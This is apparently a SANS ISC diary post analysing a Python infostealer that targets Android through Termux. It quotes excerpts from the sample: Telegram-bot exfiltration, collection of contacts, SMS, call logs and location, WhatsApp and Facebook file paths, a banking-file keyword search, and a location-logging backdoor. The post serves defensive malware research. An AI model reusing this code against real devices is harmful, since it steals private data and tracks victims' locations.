Infostealer Targeting Android Devices

    Published: 2025-10-23. Last Updated: 2025-10-23 12:09:38 UTC
    by Xavier Mertens (Version: 1)
    0 comment(s)

    Infostealers landscape exploded in 2024 and they remain a top threat today. If Windows remains a nice target (read: Attackers' favorite), I spotted an Infostealer targeting Android devices. This sounds logical that attackers pay attention to our beloved mobile devices because all our life is stored on them.

    The sample that I found (SHA256: 7576cdb835cd81ceb030f89fe5266649ed4a6201547c84da67144f407684a182) received a VT score of 0/64[1]! Undetected! The source code contains comments in Vietnamese. The sample is a Python script. How can you execute Python code on an Android device? Say hello to Termux, your new best friend.

    From the documentation: "Termux[2] is an Android terminal emulator and Linux environment app that works directly with no rooting or setup required. A minimal base system is installed automatically - additional packages are available using the APT package manager."

    Sounds great to run Python code.

    Once Termux is installed, add the Python package:

    $ pkg install python

    The infostealer is classic and exfiltrate data through a Telegram channel:

    def send_telegram(msg):
    try:
        url = f"https://api.telegram.org/bot{BOT_TOKEN}/sendMessage"
        data = {"chat_id": CHAT_ID, "text": msg}
        requests.post(url, data=data, timeout=10)
    except: pass

    But, how can the malware access Android data? Termux comes with a suite a command-line tools that provide juicy information. For example, termux-contact-list[3] returns a list of contacts stored in the phone in JSON:

    [
  {
    "id": 1,
    "name": "Alice Dupont",
    "phone_numbers": [
      "+32470123456",
      "+3221234567"
    ],
    "emails": [
      "[email protected]"
    ]
  },
  {
    "id": 2,
    "name": "Bob Martin",
    "phone_numbers": [
      "+32475123456"
    ],
    "emails": []
  },
  {
    "id": 3,
    "name": "Caroline Smith",
    "phone_numbers": [],
    "emails": [
      "[email protected]",
      "[email protected]"
    ]
  }
]

    The infostealer will collect and exfiltrate the following information:

    contacts = subprocess.getoutput('termux-contact-list')
sms = subprocess.getoutput('termux-sms-list')
call_log = subprocess.getoutput('termux-call-log')
location = subprocess.getoutput('termux-location')

    The malware tries also to exfiltrate data from apps like Facebook and Whatsapp. How? In the Android ecosystem, Termux is running in a sandbox and has access only to its own $HOME directory:

    /data/data/com.termux/files/home

    But another tools is provided: termux-setup-storage. That one will allow access to the phone storage through a mapping lile:

    /storage/emulated/0/<dir>

    Note that the victim will be prompted with a dialog prompt asking right to access data. But they’ll do right?

    The malware will try to exfiltrate more data:

    fb_paths = [
    '/storage/emulated/0/Android/data/com.facebook.katana/',
    '/storage/emulated/0/Facebook/'
]
wa_paths = [
    '/storage/emulated/0/WhatsApp/Databases/msgstore.db',
    '/storage/emulated/0/WhatsApp/Databases/wa.db',
    '/sdcard/WhatsApp/Databases/msgstore.db'
]
media_paths = [
    '/storage/emulated/0/DCIM/',
    '/storage/emulated/0/Pictures/',
    '/storage/emulated/0/Movies/',
    '/storage/emulated/0/Download/'
]

    It will also search for banking related information:

    banking_files = []
    for root, dirs, files in os.walk('/storage/emulated/0/'):
        for file in files:
            if any(keyword in file.lower() for keyword in ['bank', 'atm', 'vietcombank', 'vpbank', 'mbbank', 'acb']):
                banking_files.append(os.path.join(root, file))

     Get device info:

    device_model = subprocess.getoutput('getprop ro.product.model')
android_version = subprocess.getoutput('getprop ro.build.version.release')
device_name = subprocess.getoutput('getprop ro.product.device')

    A backdoor will be installed:

    def install_backdoor():
    try:
        backdoor_script = '''
import os, time, requests
while True:
    try:
        os.system("termux-location > /data/data/com.termux/files/home/location.txt")
        time.sleep(300)
    except:
        time.sleep(60)
'''
        with open('/data/data/com.termux/files/home/backdoor.py', 'w') as f:
            f.write(backdoor_script)
            os.system('python3 /data/data/com.termux/files/home/backdoor.py &')
        except: pass

    I just found the infostealer and I don’t know the complete infection path. How was Termux installed? Is it a PoC? But, for sure, Android devices can also be targeted!

    [1] https://www.virustotal.com/gui/file/7576cdb835cd81ceb030f89fe5266649ed4a6201547c84da67144f407684a182
    [2] https://termux.dev/en/
    [3] https://wiki.termux.com/wiki/Termux-contact-list

    Xavier Mertens (@xme)
    Xameco
    Senior ISC Handler - Freelance Cyber Security Consultant
    PGP Key

    Keywords: Exfiltration Termux Android Infostealer Malware Python
    0 comment(s)
    ISC Stormcast For Thursday, October 23rd, 2025 https://isc.sans.edu/podcastdetail/9668

      Comments

      Login here to join the discussion.


      Diary Archives